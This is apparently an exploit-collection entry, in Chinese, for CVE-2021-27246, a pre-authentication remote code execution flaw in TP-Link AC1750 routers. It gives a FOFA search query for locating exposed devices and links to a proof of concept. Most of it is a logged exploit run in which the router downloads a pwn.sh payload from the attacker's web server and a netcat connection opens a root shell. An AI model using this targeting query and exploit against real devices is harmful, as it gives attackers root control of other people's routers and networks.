# TP-Link AC1750 预认证远程代码执行漏洞（CVE-2021-27246）


在TP-Link AC1750的tdpServer守护程序中存在漏洞，没有检查json数据的大小，导致了缓冲区溢出，通过缓冲区溢出，可以导致代码执行。

FOFA:

```
app="TP_LINK-AC1750"
```

漏洞详情见：https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html

poc：https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

```
$ bash exploit.sh 
[+] Launching web server for distribution of pwn.sh
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done!
    And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload

[+] Trying the root shell (Low probability of success...)
nc -v 192.168.0.1 12345
nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused

[ ] If shell hasn't succeed, don't worry, we retry 

INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done!
    And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload
192.168.0.1 - - [30/Nov/2020 12:10:59] "GET /pwn.sh HTTP/1.1" 200 -

[+] Trying the root shell (High probability of success...)
nc -v 192.168.0.1 12345
Connection to 192.168.0.1 12345 port [tcp/*] succeeded!
uname -a
Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux
id
uid=0(root) gid=0(root)
^C[-] Stopping Webserver, now
Terminated
```

ref:

* https://www.synacktiv.com/public ... tp-link-ac1750.html
* https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020
* https://nvd.nist.gov/vuln/detail/CVE-2021-27246